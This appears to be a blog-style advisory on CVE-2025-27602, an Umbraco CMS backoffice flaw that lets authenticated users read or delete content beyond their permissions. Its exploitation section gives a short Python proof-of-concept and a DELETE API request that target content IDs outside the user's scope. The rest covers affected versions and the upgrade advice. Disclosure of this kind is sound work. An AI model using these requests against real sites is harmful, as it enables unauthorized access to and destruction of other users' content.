CVE-2025-27602 - Umbraco Unauthorized Content Access and Deletion Vulnerability in Web Backoffice

Umbraco, a popular free and open-source .NET content management system, has a recently discovered critical security flaw. This vulnerability allows authenticated backoffice users to access or delete content outside their scope of permissions.

With this post, I'll break down the details of CVE-2025-27602, including the affected versions, steps to exploit the vulnerability, code snippets, and links to the original references. If you're running any versions of Umbraco prior to 10.8.9 or 13.7.1, it's highly recommended to update as there are no known workarounds at this time.

Affected Versions

This vulnerability impacts Umbraco's web backoffice programs in versions prior to 10.8.9 and 13.7.1. Those using any of these older versions should update to the patched versions immediately.

Details on Exploitation

CVE-2025-27602 can be exploited by manipulating backoffice API URLs, allowing authenticated backoffice users to access or delete content (or media) held within folders they shouldn't have access to.

Here's a code snippet demonstrating how the vulnerability could be exploited

def exploit(umbraco_base_url, content_folder_id, user_session):
    # Manipulate the backoffice API URL to include the target folder's id
    api_url = f"{umbraco_base_url}/umbraco/backoffice/UmbracoApi/Content/GetById?id={content_folder_id}"
    
    # Send a GET request to the manipulated URL with the user's authenticated session
    response = requests.get(api_url, cookies=user_session)
    
    # If the response is successful, print out the retrieved content
    if response.status_code == 200:
        print(f"Accessed content: {response.content}")
    else:
        print("Failed to access content")

Here is an example of the API URL manipulation to delete a folder

DELETE /umbraco/backoffice/UmbracoApi/Content/DeleteById?id={content_folder_id}

By using this malicious API call, the attacker would gain unauthorized access to content or delete content from other users' folders.

The issue was reported and documented on Umbraco's official GitHub repository

- Issue: https://github.com/umbraco/Umbraco-CMS/issues/27602
- Patch: https://github.com/umbraco/Umbraco-CMS/commit/6dbd25966424df807b134db7b4a645a068aab112

These links contain further details about the vulnerability along with Umbraco's resolution in the form of patched versions 10.8.9 and 13.7.1.

Mitigation

No current workarounds exist for this vulnerability, making it crucial for all Umbraco users to update their installations to either version 10.8.9 or 13.7.1. This will resolve the unauthorized content access and deletion issue in the web backoffice program.

Conclusion

CVE-2025-27602 is a serious vulnerability affecting older versions of Umbraco's web backoffice program. It's crucial for Umbraco users to update their installations to the patched versions (10.8.9 or 13.7.1) to avoid unauthorized content access and deletion by attackers exploiting this flaw. With no existing workarounds, the only recommended solution is to update your software.

Timeline

Published on: 03/11/2025 16:15:18 UTC